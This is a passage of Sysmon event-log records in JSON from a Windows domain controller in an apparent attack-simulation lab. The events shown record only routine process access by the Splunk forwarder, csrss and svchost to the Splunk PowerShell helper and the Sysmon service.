Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010BF4C0A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010BF4C0A00}","TargetProcessId":"4248","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010BF4C0A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010BF4C0A00}","TargetProcessId":"4248","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
